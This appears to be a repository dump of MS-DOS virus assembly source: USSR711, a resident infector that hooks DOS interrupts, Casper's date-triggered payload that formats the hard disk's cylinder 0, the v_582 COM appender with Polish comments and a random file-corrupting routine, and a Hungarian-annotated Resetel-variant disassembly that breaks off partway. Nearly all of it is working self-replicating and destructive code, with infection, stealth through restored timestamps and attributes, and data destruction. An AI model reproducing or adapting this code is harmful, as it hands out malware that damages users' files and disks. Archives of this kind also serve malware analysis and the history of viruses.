;ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ
sub_7 proc near
call sub_8
;ßßßß External Entry into Subroutine ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß
sub_8:
pop si
add si,5
retn
sub_7 endp
seg_a ends
end start

384
MSDOS/Virus.MSDOS.Unknown.ussr711.asm Normal file
View File

@ -0,0 +1,384 @@
PAGE 59,132
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
;ÛÛ ÛÛ
;ÛÛ USSR711 ÛÛ
;ÛÛ ÛÛ
;ÛÛ Created: 9-Feb-92 ÛÛ
;ÛÛ Passes: 5 Analysis Options on: AW ÛÛ
;ÛÛ ÛÛ
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
data_1e equ 20h
data_2e equ 22h
data_3e equ 4Ch
data_4e equ 4Eh
data_5e equ 84h
data_6e equ 86h
data_7e equ 0D9h
data_8e equ 0DBh
data_9e equ 122h
data_10e equ 124h
data_11e equ 13Ah
data_12e equ 13Ch
data_13e equ 441h
data_14e equ 3
data_15e equ 12h
data_16e equ 0
data_17e equ 0B0h
data_18e equ 0B2h
seg_a segment byte public
assume cs:seg_a, ds:seg_a
org 100h
ussr711 proc far
start:
jmp loc_1
int 21h ; DOS Services ah=function 00h
; terminate, cs=progm seg prefx
call sub_1
ussr711 endp
;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß
; SUBROUTINE
;ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ
sub_1 proc near
pop bx
xor di,di ; Zero register
mov si,bx
sub si,3
mov ax,4B04h
int 21h ; ??INT Non-standard interrupt
cmp ax,44Bh
loc_1:
call sub_2
;ßßßß External Entry into Subroutine ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß
sub_2:
pop bx
xor di,di ; Zero register
mov si,bx
sub si,3
mov ax,4B04h
int 21h ; ??INT Non-standard interrupt
cmp ax,44Bh
je $+7Dh ; Jump if equal
mov ax,es
dec ax
mov es,ax
mov ax,es:data_14e
sub ax,2Ch
mov es:data_14e,ax
sub word ptr es:data_15e,2Ch
nop
mov es,es:data_15e
mov cx,2BBh
rep movsb ; Rep when cx >0 Mov [si] to es:[di]
cli ; Disable interrupts
xor ax,ax ; Zero register
mov ds,ax
mov cx,ds:data_5e
mov es:data_11e,cx
mov cx,ds:data_6e
mov es:data_12e,cx
mov word ptr ds:data_5e,126h
mov ds:data_6e,es
mov cx,ds:data_1e
mov es:data_7e,cx
mov cx,ds:data_2e
mov es:data_8e,cx
mov word ptr ds:data_1e,0B4h
mov ds:data_2e,es
mov cx,ds:data_3e
mov es:data_9e,cx
mov cx,ds:data_4e
mov es:data_10e,cx
mov word ptr ds:data_3e,0DDh
mov ds:data_4e,es
sti ; Enable interrupts
mov di,100h
mov si,bx
add si,2B3h
mov cx,3
rep movsb ; Rep when cx >0 Mov [si] to es:[di]
mov ax,cs
mov es,ax
mov ds,ax
xor ax,ax ; Zero register
mov si,ax
mov di,0
mov bx,offset start
jmp bx ; Register jump
add bl,[si]
db 67h, 6Fh, 50h, 2Eh,0A1h,0B2h
db 00h, 40h, 2Eh,0A3h,0B2h, 00h
db 2Eh,0A1h,0B0h, 00h, 3Dh, 00h
db 00h, 75h, 10h, 2Eh, 81h, 3Eh
db 0B2h, 00h, 74h, 37h, 75h, 07h
db 0B8h, 02h, 1Ch, 2Eh,0A3h,0B0h
db 00h
db 58h,0EAh, 0Ah, 01h, 49h,0D7h
db 2Eh, 83h, 3Eh,0B0h, 00h, 00h
db 74h, 3Ch, 80h,0FCh, 03h, 74h
db 05h, 80h,0FCh, 0Bh
db 75h, 32h
loc_3:
test dl,80h
js loc_4 ; Jump if sign=1
push ax
mov ax,cs:data_18e
and ax,3
pop ax
jnz loc_4 ; Jump if not zero
push bp
add [bp+si+7Dh],dh
push ax
mov ax,cs
mov ds,ax
mov ax,[bp+6]
push ax
popf ; Pop flags
stc ; Set carry flag
pushf ; Push flags
pop ax
mov [bp+6],ax
xor ax,ax ; Zero register
mov ds,ax
pop ax
mov ah,80h
mov ds:data_13e,ah
pop ds
pop bp
iret ; Interrupt return
loc_4:
;* jmp far ptr loc_20
sub_1 endp
db 0EAh, 49h, 01h, 08h,0D7h
cmp ax,4B04h
jne loc_5 ; Jump if not equal
mov ax,44Bh
iret ; Interrupt return
loc_5:
cmp ax,4B00h
je loc_7 ; Jump if equal
cmp ax,4B03h
je loc_7 ; Jump if equal
loc_6:
;* jmp far ptr loc_19
db 0EAh,0B5h, 02h, 46h,0D5h
loc_7:
push ax
push bx
push cx
push dx
push ds
push es
push si
push di
mov ax,ds
mov es,ax
cld ; Clear direction
mov al,0
mov di,dx
mov cx,0C8h
repne scasb ; Rep zf=0+cx >0 Scan es:[di] for al
jnz loc_8 ; Jump if not zero
std ; Set direction flag
mov al,2Eh ; '.'
mov cx,0Ah
repne scasb ; Rep zf=0+cx >0 Scan es:[di] for al
loc_8:
jnz loc_11 ; Jump if not zero
inc di
inc di
mov al,[di]
and al,0DFh
cmp al,43h ; 'C'
jne loc_11 ; Jump if not equal
mov al,[di+1]
and al,0DFh
cmp al,4Fh ; 'O'
jne loc_11 ; Jump if not equal
mov al,[di+2]
and al,0DFh
cmp al,4Dh ; 'M'
jne loc_11 ; Jump if not equal
mov al,[di-2]
and al,0DFh
cmp al,44h ; 'D'
jne loc_9 ; Jump if not equal
mov al,[di-8]
and al,0DFh
cmp al,43h ; 'C'
je loc_11 ; Jump if equal
loc_9:
mov ax,4300h
int 21h ; DOS Services ah=function 43h
; get attrb cx, filename @ds:dx
mov word ptr cs:[2B4h],cx
mov cx,20h
mov ax,4301h
int 21h ; DOS Services ah=function 43h
; set attrb cx, filename @ds:dx
jc loc_11 ; Jump if carry Set
mov word ptr cs:[2B0h],ds
mov word ptr cs:[2B2h],dx
mov ax,3D02h
int 21h ; DOS Services ah=function 3Dh
; open file, al=mode,name@ds:dx
jc loc_11 ; Jump if carry Set
mov bx,ax
mov ax,5700h
int 21h ; DOS Services ah=function 57h
; get file date+time, bx=handle
; returns cx=time, dx=time
mov word ptr cs:[2ACh],cx
mov word ptr cs:[2AEh],dx
jmp short loc_12
nop
loc_10:
jmp loc_6
loc_11:
jmp loc_16
loc_12:
mov cx,3
mov ax,cs
mov ds,ax
mov es,ax
mov dx,2B6h
mov ax,3F00h
int 21h ; DOS Services ah=function 3Fh
; read file, bx=file handle
; cx=bytes to ds:dx buffer
mov cx,0
mov dx,word ptr cs:[2B7h]
add dx,3
mov ax,4200h
int 21h ; DOS Services ah=function 42h
; move file ptr, bx=file handle
; al=method, cx,dx=offset
mov cx,0Ah
mov dx,29Bh
mov ax,3F00h
int 21h ; DOS Services ah=function 3Fh
; read file, bx=file handle
; cx=bytes to ds:dx buffer
cld ; Clear direction
mov cx,0Ah
mov si,29Bh
mov di,data_16e
repe cmpsb ; Rep zf=1+cx >0 Cmp [si] to es:[di]
jz loc_15 ; Jump if zero
mov ax,4202h
xor cx,cx ; Zero register
mov dx,cx
int 21h ; DOS Services ah=function 42h
; move file ptr, bx=file handle
; al=method, cx,dx=offset
cmp ax,6A4h
jb loc_15 ; Jump if below
jmp short loc_14
nop
loc_13:
jmp short loc_10
loc_14:
mov cx,cs:data_18e
and cx,0Fh
add cx,5
mov ax,cs
mov ds,ax
xor dx,dx ; Zero register
mov ax,4000h
int 21h ; DOS Services ah=function 40h
; write file bx=file handle
; cx=bytes from ds:dx buffer
jc loc_15 ; Jump if carry Set
mov ax,4202h
xor cx,cx ; Zero register
mov dx,cx
int 21h ; DOS Services ah=function 42h
; move file ptr, bx=file handle
; al=method, cx,dx=offset
sub ax,3
mov word ptr cs:[2AAh],ax
xor dx,dx ; Zero register
mov ax,4000h
mov cx,2BBh
int 21h ; DOS Services ah=function 40h
; write file bx=file handle
; cx=bytes from ds:dx buffer
jc loc_15 ; Jump if carry Set
mov ax,4200h
xor cx,cx ; Zero register
mov dx,cx
int 21h ; DOS Services ah=function 42h
; move file ptr, bx=file handle
; al=method, cx,dx=offset
mov ax,cs
mov ds,ax
mov dx,2A9h
mov ax,4000h
mov cx,3
int 21h ; DOS Services ah=function 40h
; write file bx=file handle
; cx=bytes from ds:dx buffer
loc_15:
mov ax,5701h
mov cx,word ptr cs:[2ACh]
mov dx,word ptr cs:[2AEh]
int 21h ; DOS Services ah=function 57h
; set file date+time, bx=handle
; cx=time, dx=time
mov ax,3E00h
int 21h ; DOS Services ah=function 3Eh
; close file, bx=file handle
mov ds,word ptr cs:[2B0h]
mov dx,word ptr cs:[2B2h]
mov cx,word ptr cs:[2B4h]
mov ax,4301h
int 21h ; DOS Services ah=function 43h
; set attrb cx, filename @ds:dx
loc_16:
pop di
pop si
pop es
pop ds
pop dx
pop cx
pop bx
pop ax
jmp short loc_13
nop
add [bx+si],al
push ax
mov ah,30h ; '0'
int 21h ; DOS Services ah=function 30h
; get DOS version number ax
cmp ax,1E03h
;* je loc_17 ; Jump if equal
db 74h, 09h
stosb ; Store al to es:[di]
stosb ; Store al to es:[di]
stosb ; Store al to es:[di]
stosb ; Store al to es:[di]
;* jmp loc_18
db 0E9h, 15h, 00h
test ax,3AA5h
push ss
db 0FEh,0B2h,0B9h, 41h, 20h, 00h
db 0B8h, 00h, 4Ch, 02h, 00h
seg_a ends
end start

33
MSDOS/Virus.MSDOS.Unknown.utility.asm Normal file
View File

@ -0,0 +1,33 @@
;****************************************************************************
;*
;* UTILITY.ASM - Manipulation Task Code For Casper The Virus. *
;* *
;* USAGE: Is automatically INCLUDED in the assembly of casper.asm *
;* *
;* DETAILS: Date Activated Hard Disk Destroyer. *
;* DATE: 1st April DAMAGE: Formats Cylinder 0 of HD. *
;* *
;**************************************************************************
mov ah,2ah ; DOS Get Date.
int 21h
cmp dx,0401h ; 5th May.
jne utilend
mov ax,0515h ;Format Cylinder, 15 Sectors.
mov ch,0 ;Cylinder 0.
mov dx,00 ;Head 0, Drive 80h.
mov es,dx ;Junk for address marks.
mov bx,0 ;Junk....
int 13h ;Do It!
int 20h ;Exit
utilend: jmp entry3
db "Hi! I'm Casper The Virus, And On April The 1st I'm "
db "Gonna Fuck Up Your Hard Disk REAL BAD! "
db "In Fact It Might Just Be Impossible To Recover! "
db "How's That Grab Ya! <GRIN>"
entry3:


324
MSDOS/Virus.MSDOS.Unknown.v_582.asm Normal file
View File

@ -0,0 +1,324 @@
; Kod ¦r˘dowy wirusa nieznanego autorstwa. Widoczne s† silne wpywy 648.
; Dodano wasne komentarze wskazuj†ce na r˘§nice midzy t† wersj† i oryginaem.
; Komentarze te poprzedzane s† znakami AK:.
; Tekst znaleziony na dysku komputera FIDO w PC Kurierze 28 wrzežnia 1990.
comment ;
**********************************************************
wszystkie adresy w programie sa uzywane jako wzgledne
do rejestru si ,nie mozna urzywac adresow bezwzglednych
jako offset poniewaz po 'doklejeniu sie do programu
moze on byc w roznych miejscach
**********************************************************
;
adr_baz equ offset stare_DTA ;adres bazowy poczatku zmiennych
;w programie wzgledem niego beda
;obliczane przesuniecia pol zmiennych
start_prg equ 100h ;adres poczatku programu typu .com
ofst_rozk equ offset rozkazy - adr_baz ;przsuniecie pola rozkazy
get_dta_addr equ 2fh ;funkcja dos pobranie adresu DTA
msdos equ 21h
write equ 40h
wirus_len equ DTA + 43 - start
code segment byte public 'code'
assume cs:code,ds:code,es:code
org 100h
st1: jmp short start
int msdos
start: mov dx,offset stare_DTA
cld ;ustawienie kierunku przesylania
mov si,dx ;poczatek zmiennych programu
add si,ofst_rozk ;adres pola rozkazy
mov di,100h ;adres pod ktorym jest poczatek programu
mov cx,3 ;ilosc bajtow do przeslania
repz movsb ;odtworzenie starego poczatku
mov si,dx ;odtworzenie si
; AK: pominito badanie wersji DOS
push es ;zachowanie es bo bedzie zmieniane
mov ah,get_dta_addr ;pobierz adres DTA
int msdos
mov [si],bx ;zapamietanie adresu DTA w polu
mov [si+2],es ;stare_DTA
pop es ;odtworzenie es
mov dx,5Fh ;adres pola DTA
add dx,si
mov ah,1Ah ;ustaw adres DTA ds:dx
int msdos
; AK: zmieniona jest kolejnožŤ instrukcji, teraz do przechowania SI u§yto
; DX zamiast stosu
push es ;zachowanie es
push si ;zachowaj si
add si,1ah ;adres tekstu PATH=
mov dx,si
mov es,ds:[2Ch] ;adres srodowiska set
; AK: w oryginale jest to PUSH SI, POP SI
mov di,0
szukaj_dalej:
mov si,dx
lodsb
mov cx,8000h ;dlugosc srodowiska
repnz scasb ;szukanie litery P
mov cx,4 ;dlugosc reszty ATH=
porownuj:
lodsb
scasb
jnz szukaj_dalej
loop porownuj
pop si ;odtworz rejestry
pop es
mov [si+16h],di ;adres pierwszego bajtu za PATH=
mov di,si
add di,1Fh ;adres bufora dla nazwy zbioru
mov bx,si
jmp short dalej
nast_sciezka:
cmp word ptr[si+16h],0 ;czy koniec path
jnz l1 ;nie
jmp exit1 ;zakoncz nie ma wiecej zbiorow
l1: push ds
push si
mov ds,es:[2Ch] ;urzywamy es: bo ds bedzie modyfikowany
mov di,si
mov si,es:[di+16h]
add di,1Fh
next: lodsb ;zaladuj kolejny znak sciezki dostepu
cmp al,';' ;czy koniec definicji scierzki
jz koniec_sciezki
cmp al,0 ;czy koniec lancucha path
jz koniec_set
stosb ;przepisz znak do bufora
jmp short next
koniec_set:
mov si,0
koniec_sciezki:
pop bx
pop ds
mov [bx+16h],si ;adres do ktorego przeszukano path
cmp byte ptr [di-1],'\' ;czy scierzka zakonczona przez \
jz dalej
mov al,'\'
stosb ;dopisz \
dalej: mov [bx+18h],di
mov si,bx
add si,10h
mov cx,6
repz movsb ;przepisanie *.com \0
mov si,bx
mov ah,4Eh ;find first
mov dx,1Fh
add dx,si
mov cx,3 ;ukryty tylko do odczytu
int msdos
jmp short czy_jest
szuk_nast:
mov ah,4Fh ;find next
int msdos
czy_jest:
jnc jest
jmp short nast_sciezka
jest: mov ax,[si+75h] ;pole zawierajace czas w DTA
and al,1Fh ;czy sa 62 sekundy
cmp al,1Fh
jz szuk_nast
cmp word ptr [si+79h],0FA00h
ja szuk_nast ;jesli zbyt dlugi
cmp word ptr [si+79h],10
jc szuk_nast
mov di,[si+18h]
push si
add si,7Dh
kopiuj:
lodsb ;kopiuje nazwe zbioru
stosb ;nazwa w postaci ASCIIZ
cmp al,0 ;czy koniec nazwy
jnz kopiuj
pop si
mov ax,4300h ;pobierz atrybuty zbioru
mov dx,1Fh
add dx,si
int msdos
mov [si+8],cx ;zapamietanie atrybutow
mov ax,4301h ;ustaw atrybuty
and cx,0FFFEh ;usuwa ewentualne r/o
mov dx,1Fh
add dx,si
int msdos
mov ax,3D02h ;otwarcie zbioru
mov dx,1Fh
add dx,si
int msdos
jnc l2 ;czy poprawne otwarcie
jmp exit2
l2: mov bx,ax
mov ax,5700h ;pobierz czas i date powstania zbioru
int msdos
mov [si+4],cx ;czas
mov [si+6],dx ;data
mov ah,2Ch ;pobierz czas systemowy
int msdos
and dh,7 ;sekundy
jnz zostaw
comment ;
**********************************************************
tutaj mozna umiescic dowolna procedure uszkadzajaca zbior
ta wywolywana jest losowo jesli ostatnie trzy bity sekund
zegara systemu sa rowne zero np. 8,16,24 itd.
**********************************************************
;
mov ah,write ;zapis do zbioru
mov cx,5 ;pieciu bajtow lezacych
mov dx,si ;juz poza programem czyli
add dx,8Ah ;faktycznie dowolnych
int msdos
jmp exit3
;*********************************************************
;koniec procedury uszkadzajacej zbior
;*********************************************************
zostaw: mov ah,3Fh ;odczyt trzech pierwszych
mov cx,3 ;bajtow z pliku
mov dx,ofst_rozk ;do pola rozkazy
add dx,si
int msdos
jc exit3 ;jesli byl blad czytania
cmp ax,3 ;czy odczytano dokladnie
jnz exit3 ;trzy bajty
mov ax,4202h ;przewiniecie zbioru na koniec
mov cx,0
mov dx,0
int msdos
jc exit3 ;jesli blad
mov cx,ax ;w ax dlugosc zbioru
sub ax,3
;obiczanie przesuniecia dla skoku do poczatku wirusa
;jest to adres konca zbioru minus 3 poniewaz
;jmp jest trzy bajtowy
mov [si+0Eh],ax ;zapis adresu w polu skok
add cx,adr_baz - start + start_prg
;obliczanie adresu poczatku danych (tego ktory jest w si)
;jest to adres pola stare_DTA + 100h przesuniecia programu
mov di,si
sub di,adr_baz - start - 1
mov [di],cx ;zapisanie adresu bezposrednio w pole
;w pole rozkazu mov dx,offset
mov ah,write ;dopisanie wirusa na koniec
mov cx,wirus_len ;dlugosc wirusa
mov dx,si
sub dx,adr_baz - start ;obliczenie adresu poczatku wirusa
int msdos
jc exit3 ;jesli blad
cmp ax,wirus_len ;czy zapisano calego wirusa
jnz exit3
mov ax,4200h ;przewiniecie zbioru na poczatek
mov cx,0
mov dx,0
int msdos
jc exit3 ;jesli blad
mov ah,write ;zapis jmp do wirusa
mov cx,3 ;na poczatku
mov dx,si
add dx,0Dh ;pole skok
int msdos
exit1: mov dx,[si+6] ;data
mov cx,[si+4] ;czas
or cx,1Fh ;zaznaczenie ze zbior jest zarazony
;ilosc sekund = 62
mov ax,5701h ;zapis daty i czasu do zbioru
int msdos
mov ah,3Eh ;zamkniecie zbioru
int msdos
exit2: mov ax,4301h ;ustawienie atrybutow
mov cx,[si+8] ;stare atrybuty
mov dx,001Fh
add dx,si
int msdos
exit3: push ds
mov ah,1Ah ;ustaw adres DTA
mov dx,[si+0] ;pole stare_DTA
mov ds,es:[si+2]
int msdos
pop ds
xor ax,ax ;zerowanie rejestrow
xor bx,bx
xor dx,dx
xor si,si
mov di,0100h ;na stos adres startu
push di
xor di,di
ret
stare_DTA dd 0
czas_zb dw 0
data_zb dw 0
attr_zb dw 0
rozkazy db 0b4h,4ch,0cdh
skok db 0e9h,0,0 ;kod rozkazu jmp
zbior db '*.com',0
srodow dw 0 ;adres srodowiska set
bufor dw 0 ;wskaznik do nazwy zbioru
path db 'PATH='
nazwa_zb db 63 dup(0) ;pole na nazwe zbioru
DTA db 43 dup(0) ;pole dta
code ends
end st1


669
MSDOS/Virus.MSDOS.Unknown.v_822.asm Normal file
View File

@ -0,0 +1,669 @@
A Resetel vˇrus Tltget fle mut nsa
***************************************
A Resetel vˇrussal teljes egszben megegyezik a fertz mechanizmus.
Eltekintve att˘l, hogy ez a mut ns nem tesz tnkre f jlokat. Az adatter<EFBFBD>let is
ugyanazon a cˇmen van, ˇgy ugyanŁgy lehet ˇrtani, mint a Resetelt. A v ltoz s:
a vˇrus hossza 822 byte, minden indˇt s ut n az A:-r˘l megpr˘b lja beolvasni a
BOOT-ot, majd a 40/80-dik s vot. Ha valamelyik Tltgetvel fertztt, akkor
elindˇtja a Tltgett !
;Ide (0100-ra) mutat a file elejr”l az ugr˘ utasˇt s.
;Els” feladat: az els” 3 byte visszaˇr sa az eredetire.
0100 51 PUSH CX ;CX a stacken marad mindvgig.
;A k”vetkez” utasˇt s operandus t ( jelen esetben 02F9-et )
;fert”zskor  llˇtja be , ˇgy mindig a helyes cˇmre mutat.
0101 BAF902 MOV DX,02F9 ;Eredeti els” 3 byte cˇme-10h
0104 FC CLD ;( ERE_DTA_OFS)
0105 8BF2 MOV SI,DX
0107 81C60A00 ADD SI,000A ;SI=offset ERE_KEZD
010B BF0001 MOV DI,0100 ;Program eleje
010E B90300 MOV CX,0003 ;3 byte
0111 F3 REPZ
0112 A4 MOVSB ;Az eredeti byteok vissza llˇt sa
;-----------------------------------------
; Install ci˘s rsz:
;-----------------------------------------
;DOS verzi˘ lekrdezse. 1.00-n l kisebb verzi˘n l az eredeti
;program futtat sa: ekkor a vˇrus nem m<>k”dik.
0113 8BF2 MOV SI,DX ;Ezut n SI-ben az adatter<65>let cˇme
0115 B430 MOV AH,30
0117 CD21 INT 21 ;DOS verzi˘ lekrdezse
0119 3C00 CMP AL,00 ;Csak 1.00-n l kisebbnl lp ki
011B 7503 JNZ 0120
011D E9C701 JMP 02E7 ;Eredeti program futtat sa
;Disk Transzfer Address lekrdezse, elmentse
0120 06 PUSH ES
0121 B42F MOV AH,2F
0123 CD21 INT 21 ;DTA leolvas sa (ES:BX), meg”rzse
0125 899C0000 MOV [SI+0000],BX ;ERE_DTA_OFS (02F9)
0129 8C840200 MOV [SI+0002],ES ;ERE_DTA_SEG (02FB)
;-------------------------------------------------------
; A beiktatott behŁz˘ rsz
;-------------------------------------------------------
012D E85802 CALL 0388
0130 07 POP ES
;DTA be llˇt sa ENTRY cˇmre (0358). Igy a FindFirst, FindNext
;DOS funkci˘k ide fogj k m solni a file adatait (nevt,idejt,
;hossz t,stb).
0131 BA5F00 MOV DX,005F
;{Val˘szˇn<CB87>leg rgi assemblerrel ˇrt k a vˇrust, ezrt van itt
;egy NOP utasˇt s.}
0134 90 NOP
0135 03D6 ADD DX,SI
0137 B41A MOV AH,1A
0139 CD21 INT 21 ;DTA  llˇt sa DS:DX-re: ENTRY(0358)
;A PATH-ok cˇmnek megkeresse. Ha az aktu lis k”nyvt rban m r
;mindegyik filet megfert”zte , itt taj lja meg azoknak az al-
;k”nyvt raknak a nevt , amelyekben mg megfert”zend” fileokat
;tal lhat.
013B 06 PUSH ES
013C 56 PUSH SI
013D 8E062C00 MOV ES,[002C];Environment (k”rnyezet) segmense
0141 BF0000 MOV DI,0000 ;ES:DI fog a megfelel” helyre
;(a k”vetkez” directoryra) mutatni
;A k”vetkez” rsz a PATH= sz”veget keresi meg az environment
;ter<65>leten:
0144 5E POP SI
0145 56 PUSH SI
0146 81C61A00 ADD SI,001A ;STR_PATH (0313)
014A AC LODSB ;AL=DS:[SI],SI++
014B B90080 MOV CX,8000 ;max 32k az environment
014E F2 REPNZ
014F AE SCASB ;AL-ES:[DI] Megkeresi a k”vetkez”
;'P' bet<65>t
0150 B90400 MOV CX,0004 ;Mg 4 bet<65> azonosˇt sa
0153 AC LODSB ;AL=DS:[SI],SI++
0154 AE SCASB ;AL-ES:[DI],DI++
0155 75ED JNZ 0144 ;Ugr s, ha a k”vetkez” 4 bet<65> nem
;egyezik (nem 'ATH=')
0157 E2FA LOOP 0153
0159 5E POP SI ;ES:DI mutat az els” PATH-ra
015A 07 POP ES
015B 89BC1600 MOV [SI+0016],DI ;PATH_MUT (030F)
015F 8BFE MOV DI,SI ;{Hogy ez minek ? Ks”bb Łgyis
0161 81C71F00 ADD DI,001F ;fel<65>lˇrja} FILE_PATH (0318)
0165 8BDE MOV BX,SI ;Ezut n BX mutat az adatokra
0167 81C61F00 ADD SI,001F ;SI is a FILE_PATH-ra(0318) mutat
016B 8BFE MOV DI,SI ;{Az el”bb m r be llitotta (?)}
016D EB3A JMP 01A9
;A k”vetkez” PATH-ban megadott aldirectoryt FILE_PATH-ra m -
;solja. Igy a k”vetkez” fileokat m r ebben az aldirectoryban
;fogja keresni.
016F 83BC160000 CMP WORD PTR [SI+0016],+00 ;PATH_MUT (030F)
0174 7503 JNZ 0179
0176 E96001 JMP 02D9 ;Ugr s, ha nincs t”bb PATH aldir.
;(mindet megfert”te m r)
0179 1E PUSH DS
017A 56 PUSH SI
017B 26 ES:
017C 8E1E2C00 MOV DS,[002C] ;Environment segmense
0180 8BFE MOV DI,SI ;(02F9)
0182 26 ES:
0183 8BB51600 MOV SI,[DI+0016] ;PATH_MUT (030F)
0187 81C71F00 ADD DI,001F ;FILE_PATH cˇme (0318)
018B AC LODSB ;AL=DS:[SI] SI++
018C 3C3B CMP AL,3B ;';'
018E 740A JZ 019A
0190 3C00 CMP AL,00
0192 7403 JZ 0197
0194 AA STOSB ;ES:[DI]:=AL DI++
0195 EBF4 JMP 018B ;Źtm sol s ';' vagy #0-ig
;#0-val z rult a PATH bejegyzs => nem lesz t”bb
0197 BE0000 MOV SI,0000
019A 5B POP BX ;Ezut n BX mutat az adatokra
019B 1F POP DS
019C 89B71600 MOV [BX+0016],SI ;PATH_MUT (030F) = 0
;( Nincs t”bb PATH jelzs )
;A k”vetkez” PATH-ban adott aldir. m r  tm solva.
01A0 807DFF5C CMP BYTE PTR [DI-01],5C
01A4 7403 JZ 01A6 ;Ugr s, ha az ut˘ls˘ bet<65> a '\'
01A6 B05C MOV AL,5C ;Egybknt '\' ˇr s
01A8 AA STOSB ;ES:[DI]:=AL DI++
;Egy aldirectory kirtkelse . El”sz”r az aktu lis , majd a
;FILE_PATH -ra m solt aldirectory vgignzse, fert”zs.
;DI a FILE_PATH-ba ˇrt aldirectory neve ut ni pozici˘ra mutat.
;A COM kiterjeszts<E2809A> fileok megkeresse:
01A9 89BF1800 MOV [BX+0018],DI ;FILE_NEV_MUT (0311)
;Ide kell majd a file nevt
;m solni (az aldir. neve ut n)
01AD 8BF3 MOV SI,BX ;(02F9)
01AF 81C61000 ADD SI,0010 ;KERES_STR (0309)
01B3 B90600 MOV CX,0006 ;6 bet<65>  tm sol sa ('*.COM',0)
01B6 F3 REPZ ;A PATH-ban megadott aldirectory
01B7 A4 MOVSB ;m”g , ˇgy teljes keressi utunk
;lesz
01B8 8BF3 MOV SI,BX ;(02F9)
01BA B44E MOV AH,4E ;FIND FIRST ENTRY
01BC BA1F00 MOV DX,001F
01BF 90 NOP
01C0 03D6 ADD DX,SI ;FILE_PATH (0318)
01C2 B90300 MOV CX,0003 ;HIDDEN, READ ONLY
01C5 CD21 INT 21 ;Az els” COM kiterjeszts<E2809A> file
;megkeresse . A file adatait a DTA
; ltal mutatott cˇmre (ENTRY 0358)
;m solja.
01C7 EB04 JMP 01CD
;K”vetkez” COM file keresse (adatai ENTRY-re ker<65>lnek).
01C9 B44F MOV AH,4F ;FIND NEXT
01CB CD21 INT 21
01CD 7302 JNB 01D1
01CF EB9E JMP 016F ;Ha nem tal l t”bb COM filet : —j
;aldirt keres a PATH-ban
;M r tal lt COM filet. Adataival az ENTRY fel van t”ltve.Ennek
;a filenak az ellen”rzse, fert”zse k”vetkezik.
;Annak ellen”rzse , hogy a file megfert”zhet”-e (fert”z”tt-e,
;tŁl hosszŁ-e, tŁl r”vid-e) . Ha nem fert”zhet” visszaugrik Łj
;fileokat keresni.
01D1 8B847500 MOV AX,[SI+0075] ;ENT_IDO (036E) A file ideje
01D5 241F AND AL,1F
01D7 3C1F CMP AL,1F ;Ugr s, ha az als˘ 5 bit 1-es:
01D9 74EE JZ 01C9 ;a file m r fert”z”tt.
01DB 81BC790000FA CMP WORD PTR [SI+0079],FA00 ;ENT_HOSSZ (0372)
01E1 77E6 JA 01C9 ;Ugr s, ha file hossza nagyobb,mint
;64000h (m r nem fr bele a vˇrus)
01E3 83BC79000A CMP WORD PTR [SI+0079],+0A ;ENT_HOSSZ (0372)
01E8 72DF JB 01C9 ;Ugr s, ha r”videbb 10h byten l
;-----------------------------------------
; Megvan a kiv laszott file.
;-----------------------------------------
;A file nevt az aldirectory neve ut n kell m solni , hogy a
;teljes Łt rendelkezs<E2809A>nkre  lljon , ˇgy majd meg tudja nyitni
;a filet.
01EA 8BBC1800 MOV DI,[SI+0018] ;FILE_NEV_MUT (0311) Ide fogja
01EE 56 PUSH SI ;a file nevt m solni
01EF 81C67D00 ADD SI,007D ;ENT_NEV (0376)
01F3 AC LODSB ;AL:=DS:[SI] SI++
01F4 AA STOSB ;ES:[DI]:=AL DI++ (M sol s)
01F5 3C00 CMP AL,00 ;Nvlez r˘ 0-ig m sol
01F7 75FA JNZ 01F3
01F9 5E POP SI ;SI Łjra az adatokra mutat
;A file egyes eredeti inform ci˘inak meg”rzse , hogy a fert”-
;zs ne t<>nj”n fel.
;Az eredeti attributtum meg”rzse:
;{Fogalmam sincs mirt kell a file attributtum t mg egyszer
;lekrdezni , amikor az ENTRY ter<65>leten megtal lhat˘ . Tal n a
;vˇrus ˇr˘ja nem tudta?}
01FA B80043 MOV AX,4300 ;File attributtum nak lekrdezse
01FD BA1F00 MOV DX,001F ;FILE_PATH ([SI+1F] 0318)
0200 90 NOP ;{piszok}
0201 03D6 ADD DX,SI ;DS:DX mutat a file Łtj ra
0203 CD21 INT 21 ;CX-ben az attributtum
0205 898C0800 MOV [SI+0008],CX ;ERE_ATTR (0301)
;A file ˇr svdelmnek t”rlse:
0209 B80143 MOV AX,4301 ;File attributtum nak  llit sa
020C 81E1FEFF AND CX,FFFE ;Read Only jelzs t”rlse
0210 BA1F00 MOV DX,001F ;{ Az el”bb m r be llˇtotta, minek
0213 90 NOP ;Łjra? }
0214 03D6 ADD DX,SI ;FILE_PATH (0318)
0216 CD21 INT 21
;File megnyit sa:
0218 B8023D MOV AX,3D02 ;File megnyit sa ˇr sra, olvas sra
021B BA1F00 MOV DX,001F ;{Mg egyszer be llˇtja!}
021E 90 NOP ;{piszok}
021F 03D6 ADD DX,SI ;FILE_PATH (0318)
0221 CD21 INT 21
0223 7303 JNB 0228
0225 E9A200 JMP 02CA ;Hib n l: nincs fert”zs
0228 8BD8 MOV BX,AX ;Handle
